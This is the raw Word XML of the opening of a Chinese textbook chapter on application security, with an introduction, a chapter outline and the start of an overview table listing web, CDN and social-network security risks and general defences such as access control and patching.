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0932" w14:textId="6A92675A" w:rsidR="00676419" w:rsidRPr="00B8458A" w:rsidRDefault="00802277" w:rsidP="006B78EE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:ind w:firstLine="883"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc60224562"/>
      <w:bookmarkStart w:id="1" w:name="_Toc60413307"/>
      <w:r w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r w:rsidR="00D16EAC">
        <w:t>13</w:t>
      </w:r>
      <w:r w:rsidR="000A62F8" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>章</w:t>
      </w:r>
      <w:r w:rsidR="000A62F8" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidR="00D16EAC" w:rsidRPr="0016670B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F850F" w14:textId="3DA8ECEA" w:rsidR="00096BC3" w:rsidRPr="00B8458A" w:rsidRDefault="00096BC3" w:rsidP="00096BC3">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引言</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="3F204799" w14:textId="77777777" w:rsidR="00096BC3" w:rsidRDefault="00096BC3" w:rsidP="00096BC3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>平时看视频的时候，有时会会觉得卡；浏览某些网站的时候，突然就登录不上了；微信、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>QQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>好友经常会发给你一些奇奇怪怪的链接或者信息，然后你会回复，“你号被盗了？”；一些私人信息突然被暴露在网络中，可能是某个心理测试的结果泄露的。以上的等等问题，都是我们日常生活中可以遇到的网络安全问题，但是它的直接体现</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确只是</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某个特定的应用场景中。因此关注应用安全问题变得十分重要。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5467866E" w14:textId="77777777" w:rsidR="00096BC3" w:rsidRDefault="00096BC3" w:rsidP="00096BC3">
      <w:r w:rsidRPr="00364DAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全是通过查找、修复和增强应用的安全性，使应用更加安全的过程。这大部分发生在开发阶段，但它包括工具和方法，以保护应用程序部署后。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全可能包括可识别或最大限度减少安全漏洞的硬件、软件和规程。路由器是硬件应用安全的一种形式，可以防止任何人通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Internet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看计算机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。但应用级别的安全措施往往也内置于软件中，例如应用防火墙，其对允许和禁止哪些活动</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作出</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了严格定义。规程涉及的是与包含常规测试等协议的应用安全例程类似的事项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0960ABFB" w14:textId="00D2112B" w:rsidR="00830582" w:rsidRPr="00B8458A" w:rsidRDefault="00096BC3" w:rsidP="00096BC3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全非常重要，因为今天的应用往往可通过各种网络获取并且一般都连接到云环境，这就增加了其遭受安全威胁和侵害的风险。不仅要在网络层面确保安全，还要注重应用本身的安全，在这一点上，人们面临的压力越来越大，受到的激励也越来越高。造成这种情况的一个原因在于，现如今，黑客攻击应用的次数比以往更多。应用安全测试可以揭示应用级别的薄弱之处，从而帮助避免这些攻击。</w:t>
      </w:r>
      <w:r w:rsidR="00830582">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本章就各种网络应用中出现的安全问题，分析应用安全问题出现的根本原因，概述解决网络应用安全的根本思路。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C43429B" w14:textId="54F909B3" w:rsidR="00847211" w:rsidRPr="00B8458A" w:rsidRDefault="00024697" w:rsidP="006B78EE">
      <w:r w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全章分为四节，</w:t>
      </w:r>
      <w:r w:rsidR="00C97B59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引言</w:t>
      </w:r>
      <w:r w:rsidR="00830582" w:rsidRPr="00830582">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>介绍了网络应用安全的概念、背景及当前面临的主要安全问题</w:t>
      </w:r>
      <w:r w:rsidR="00676419" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。第</w:t>
      </w:r>
      <w:r w:rsidR="00C97B59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一</w:t>
      </w:r>
      <w:r w:rsidR="00676419" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节</w:t>
      </w:r>
      <w:r w:rsidR="00830582" w:rsidRPr="00830582">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>剖析了导致应用安全问题，层出不穷的本质及共性原因是什么，应用中的哪些不当设计或缺陷，使得当前的网络系统易于受到攻击破坏</w:t>
      </w:r>
      <w:r w:rsidR="00307AF5" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="00676419" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第</w:t>
      </w:r>
      <w:r w:rsidR="00C97B59">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二</w:t>
      </w:r>
      <w:r w:rsidR="006F099D" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节</w:t>
      </w:r>
      <w:r w:rsidR="00830582" w:rsidRPr="00830582">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对应用安全问题的共性原因，给出了基本的网络安全防御原理和实践原则</w:t>
      </w:r>
      <w:r w:rsidR="008F79A3" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="000F0531">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三</w:t>
      </w:r>
      <w:r w:rsidR="008F79A3" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节</w:t>
      </w:r>
      <w:r w:rsidR="00830582" w:rsidRPr="00830582">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过介绍典型的网络安全攻防实例，贯穿本章，讲解实际场景中网络安全事件如何发生、危害是什么、产生的原因及如何防御</w:t>
      </w:r>
      <w:r w:rsidR="00676419" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="000F0531">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后一章</w:t>
      </w:r>
      <w:r w:rsidR="000F0531" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对本章进行总结</w:t>
      </w:r>
      <w:r w:rsidR="000F0531">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00CD4ED7" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidR="00D568F6" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00830582">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D568F6" w:rsidRPr="00B8458A">
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="006A7325" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为本章的主要内容及知识框架</w:t>
      </w:r>
      <w:r w:rsidR="00CD4ED7" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368A25FE" w14:textId="1EBA109A" w:rsidR="00891F6E" w:rsidRDefault="006B2902" w:rsidP="00966977">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidR="00D568F6" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00966977">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00D568F6" w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8458A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00966977" w:rsidRPr="00966977">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全问题概览</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>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544"/>
        <w:gridCol w:w="2835"/>
        <w:gridCol w:w="1985"/>
        <w:gridCol w:w="1912"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966977" w:rsidRPr="00CC3BE6" w14:paraId="608832C7" w14:textId="77777777" w:rsidTr="00966977">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="933" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5910B06F" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>网络应用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1713" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="704D87BC" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>安全问题本质</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="695D2956" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>安全隐患</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3607B3C4" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC3BE6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966977" w:rsidRPr="00CC3BE6" w14:paraId="0D6C366B" w14:textId="77777777" w:rsidTr="00966977">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="933" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6410EE8F" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1713" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="789CBDDC" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00FA103E" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">(1) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>资源共享的不确定性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="302C9FED" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00FA103E" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">(2) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>应用资源的有限性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B001C71" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00FA103E" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">(3) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>相关应用系统的漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E4FF09F" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="007C66B4" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">(1) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>数据窃取</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BCEC7E0" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="007C66B4" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>应用无法访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36D6941F" w14:textId="77777777" w:rsidR="00966977" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">(1) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>访问控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60FD487E" w14:textId="77777777" w:rsidR="00966977" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>漏洞修复</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FD304CE" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">3) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>监控警报</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966977" w:rsidRPr="00CC3BE6" w14:paraId="50780E3E" w14:textId="77777777" w:rsidTr="00966977">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="933" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B7069C9" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>CDN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1713" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7296FF5C" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25CF673B" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20B8112F" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966977" w:rsidRPr="00CC3BE6" w14:paraId="45287418" w14:textId="77777777" w:rsidTr="00966977">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="933" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28C73605" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>社交网络安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1713" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D701AF4" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50C70B3C" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F06DBBA" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966977" w:rsidRPr="00CC3BE6" w14:paraId="47562768" w14:textId="77777777" w:rsidTr="00966977">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="933" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BFA8A92" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
